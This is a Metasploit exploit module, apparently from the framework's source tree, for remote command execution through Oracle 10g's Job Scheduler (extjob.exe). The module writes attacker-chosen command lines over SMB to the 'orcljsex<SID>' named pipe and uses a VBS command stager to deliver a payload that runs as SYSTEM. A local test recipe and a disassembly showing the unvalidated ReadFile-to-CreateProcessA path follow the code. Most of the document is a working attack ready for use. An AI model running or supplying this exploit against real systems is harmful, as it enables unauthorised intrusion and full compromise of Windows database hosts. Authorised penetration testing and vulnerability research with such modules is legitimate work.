##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
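class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::SMB::Client
  include Msf::Exploit::CmdStager

  # Module metadata. The Job Scheduler service (extjob.exe) is reached over an
  # SMB named pipe, so the SMB::Client mixin supplies RHOST/SMBUser/SMBPass and
  # the CmdStager mixin drives +execute_command+ once per staged line.
  #
  # @param info [Hash] extra module info merged by the framework
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Oracle Job Scheduler Named Pipe Command Execution',
        'Description' => %q{
          This module exploits the Oracle Job Scheduler to execute arbitrary commands. The Job
          Scheduler is implemented via the component extjob.exe which listens on a named pipe
          called "orcljsex<SID>" and execute arbitrary commands received over this channel via
          CreateProcess(). In order to connect to the Named Pipe remotely, SMB access is required.
          Note that the Job Scheduler is disabled in default installations.
        },
        'Author' => [
          'David Litchfield', # Vulnerability discovery and exploit
          'juan vazquez', # Metasploit module
          'sinn3r' # Metasploit fu
        ],
        'License' => MSF_LICENSE,
        'References' => [
          [ 'URL', 'http://www.amazon.com/Oracle-Hackers-Handbook-Hacking-Defending/dp/0470080221' ],
        ],
        'Payload' => {
          'Space' => 2048,
        },
        'Platform' => 'win',
        # This module has been tested on Oracle 10g Release 1
        # where the Oracle Job Scheduler runs as SYSTEM on Windows
        'Targets' => [['Automatic', {}]],
        'CmdStagerFlavor' => 'vbs',
        'Privileged' => true,
        'DisclosureDate' => '2007-01-01',
        'DefaultTarget' => 0,
        # Left as UNKNOWN_* by the original authors; note that the VBS stager
        # and the check below both leave traces on the target.
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options(
      [
        OptString.new('SID', [ true, 'The database sid', 'ORCL'])
      ]
    )
  end

  # Entry point. Re-runs +check+ first and aborts with a NotVulnerable failure
  # (instead of silently printing and returning) when the pipe does not behave
  # like extjob.exe, then stages the payload through +execute_command+.
  #
  # @raise [Msf::Exploit::Failed] via fail_with when the check does not pass
  def exploit
    unless check == Exploit::CheckCode::Vulnerable
      fail_with(Failure::NotVulnerable, 'Host does not appear to be vulnerable!')
    end

    print_status("Exploiting through \\\\#{datastore['RHOST']}\\orcljsex#{datastore['SID']} named pipe...")
    # linemax caps the length of each staged line; each one becomes a separate
    # cmd.exe invocation via execute_command below.
    execute_cmdstager(linemax: 1500)
    handler
  end

  # CmdStager callback: open a fresh SMB session, write one command line to the
  # scheduler pipe and tear the session down again.
  #
  # The SMB session is always released in +ensure+ so a failed login or a pipe
  # error during staging does not leak the connection.
  #
  # @param cmd [String] the command line to run on the target
  # @param opts [Hash] stager options (unused here, required by the mixin)
  def execute_command(cmd, opts)
    connect
    smb_login
    pipe = simple.create_pipe(scheduler_pipe_name)
    pipe.write("cmd.exe /q /c #{cmd}")
    pipe.close
  ensure
    disconnect
  end

  # Vulnerability check. This check is intrusive: it runs `cmd.exe /q /c dir`
  # through the pipe and reads back the value the service writes in reply
  # (the original analysis expects the exit code "1").
  #
  # Any connection, login or pipe error is logged (verbose) and reported as
  # Safe, matching the original best-effort behaviour; the SMB session is
  # released in +ensure+ on every path.
  #
  # @return [Exploit::CheckCode] Vulnerable when the expected exit code is
  #   read back, Safe otherwise
  def check
    connect
    smb_login
    pipe = simple.create_pipe(scheduler_pipe_name)
    pipe.write('cmd.exe /q /c dir')
    exit_code = pipe.read # Exit Code
    pipe.close

    exit_code == '1' ? Exploit::CheckCode::Vulnerable : Exploit::CheckCode::Safe
  rescue StandardError => e
    vprint_error("Check failed: #{e.class} - #{e.message}")
    Exploit::CheckCode::Safe
  ensure
    disconnect
  end

  private

  # Name of the pipe extjob.exe creates for the configured SID
  # ("\\\\.\\pipe\\orcljsex%s" on the service side; see the analysis below).
  #
  # @return [String] pipe path relative to the IPC$ share
  def scheduler_pipe_name
    "\\orcljsex#{datastore['SID']}"
  end
end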
=begin
How To Test locally:
1. Go to Administrative Tools -> Services -> Set 'OracleJobSchedulerORCL' to automatic, and
then Start the service.
2. Make sure you know your SMBUser and SMBPass
3. Run:
C:\Documents and Settings\juan\PipeList>echo cmd.exe /c calc.exe > \\.\pipe\orcljsexorcl
Code Analysis of extjob.exe (Oracle 10g Release 1)
=================================================
From _ServiceStart():
* Create the Named Pipe and store its handle in "esi":
.text:004017EC push offset _pipename
.text:004017F1 lea ecx, [ebp+Name]
.text:004017F7 push offset $SG59611 ; "\\\\.\\pipe\\orcljsex%s"
.text:004017FC push ecx
.text:004017FD jmp short loc_401810
.text:004017FF ; ---------------------------------------------------------------------------
.text:004017FF
.text:004017FF loc_4017FF: ; CODE XREF: _ServiceStart+FAj
.text:004017FF push offset $SG59613
.text:00401804 lea edx, [ebp+Name]
.text:0040180A push offset $SG59614 ; "\\\\.\\pipe\\orcljsex%s"
.text:0040180F push edx ; Dest
.text:00401810
.text:00401810 loc_401810: ; CODE XREF: _ServiceStart+10Dj
.text:00401810 call ds:__imp__sprintf
.text:00401816 add esp, 0Ch
.text:00401819 push edi
.text:0040181A push edi
.text:0040181B push 4
.text:0040181D call _ReportStatusToSCMgr
.text:00401822 add esp, 0Ch
.text:00401825 test eax, eax
.text:00401827 jz loc_4018EC
.text:0040182D mov edi, ds:__imp__CreateNamedPipeA@32 ; CreateNamedPipeA(x,x,x,x,x,x,x,x)
.text:0040185C mov esi, eax
* Connect the Named Pipe (wait for a client):
.text:0040188F push eax ; lpOverlapped
.text:00401890 push esi ; hNamedPipe
.text:00401891 call ds:__imp__ConnectNamedPipe@8 ; ConnectNamedPipe(x,x)
* Create a thread with ExecMain() as lpStartAddress and esi (the pipe handle) as its parameter:
.text:004018B9 lea edx, [ebp+ThreadId]
.text:004018BC push edx ; lpThreadId
.text:004018BD push 0 ; dwCreationFlags
.text:004018BF push esi ; lpParameter
.text:004018C0 push offset _ExecMain ; lpStartAddress
.text:004018C5 push 0 ; dwStackSize
.text:004018C7 push 0 ; lpThreadAttributes
.text:004018C9 call ds:__imp__CreateThread@24 ; CreateThread(x,x,x,x,x,x)
From ExecMain():
* Store the Named Pipe handle in ebx:
.text:0040197C mov ebx, [ebp+hObject]
* Read up to 0x10000 bytes from the Named Pipe into a stack buffer:
.text:004019C4 lea eax, [ebp+NumberOfBytesRead]
.text:004019C7 push edx ; lpOverlapped
.text:004019C8 push eax ; lpNumberOfBytesRead
.text:004019C9 lea ecx, [ebp+Buffer]
.text:004019CF push 10000h ; nNumberOfBytesToRead
.text:004019D4 push ecx ; lpBuffer
.text:004019D5 push ebx ; hFile
.text:004019D6 call ds:__imp__ReadFile@20 ; ReadFile(x,x,x,x,x)
* CreateProcess() with lpCommandLine fully controlled by the input read from the pipe (no validation between ReadFile and CreateProcessA):
.text:00401A06 mov ecx, 11h
.text:00401A0B xor eax, eax
.text:00401A0D lea edi, [ebp+StartupInfo]
.text:00401A10 push esi
.text:00401A11 rep stosd
.text:00401A13 lea eax, [ebp+ProcessInformation]
.text:00401A16 lea ecx, [ebp+StartupInfo]
.text:00401A19 push eax ; lpProcessInformation
.text:00401A1A push ecx ; lpStartupInfo
.text:00401A1B push 0 ; lpCurrentDirectory
.text:00401A1D push 0 ; lpEnvironment
.text:00401A1F push 0 ; dwCreationFlags
.text:00401A21 push 0 ; bInheritHandles
.text:00401A23 push 0 ; lpThreadAttributes
.text:00401A25 lea edx, [ebp+Buffer]
.text:00401A2B push 0 ; lpProcessAttributes
.text:00401A2D push edx ; lpCommandLine
.text:00401A2E push 0 ; lpApplicationName
.text:00401A30 mov [ebp+StartupInfo.cb], 44h
.text:00401A37 mov [ebp+StartupInfo.wShowWindow], 5
.text:00401A3D mov [ebp+StartupInfo.dwFlags], 100h
.text:00401A44 mov [ebp+StartupInfo.lpDesktop], offset $SG59671
.text:00401A4B call ds:__imp__CreateProcessA@40 ; CreateProcessA(x,x,x,x,x,x,x,x,x,x)
=end